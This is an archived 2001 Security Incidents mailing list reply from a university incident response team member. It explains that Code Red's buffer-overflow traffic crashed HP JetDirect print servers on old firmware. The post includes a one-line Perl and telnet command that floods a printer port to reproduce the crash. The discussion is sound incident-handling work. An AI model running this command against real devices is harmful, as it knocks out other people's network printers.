Security Incidents mailing list archives

Re: Nimda affecting HP LaserJet / JetDirect devices?


From: johan.augustsson () adm gu se
Date: Mon, 24 Sep 2001 16:32:12 +0200

Trey Valenta wrote:

To the best of my knowledge, HP printer issues from Code Red weren't from
traffic *volume*, but from content. The HTTP commands were causing the
printer's print server software to shut down when running older firmware
versions for the JetDirect interface.

Code Red sent buffer owerflow packages. Those packages downed HP Jet
Directs with "old" firmware.
Following line will do the job:
perl -e 'print "\x90"x4097;'|telnet <ip-address> <port>


-- 
--------------------------------------------------------------------
Johan Augustsson                 Phone: +46 (0)31 773 5361
Incident Response Team           Fax: +46 (0)31 773 1087
Göteborg University              E-mail: Johan.Augustsson () adm gu se
Sweden
--------------------------------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com


Current thread: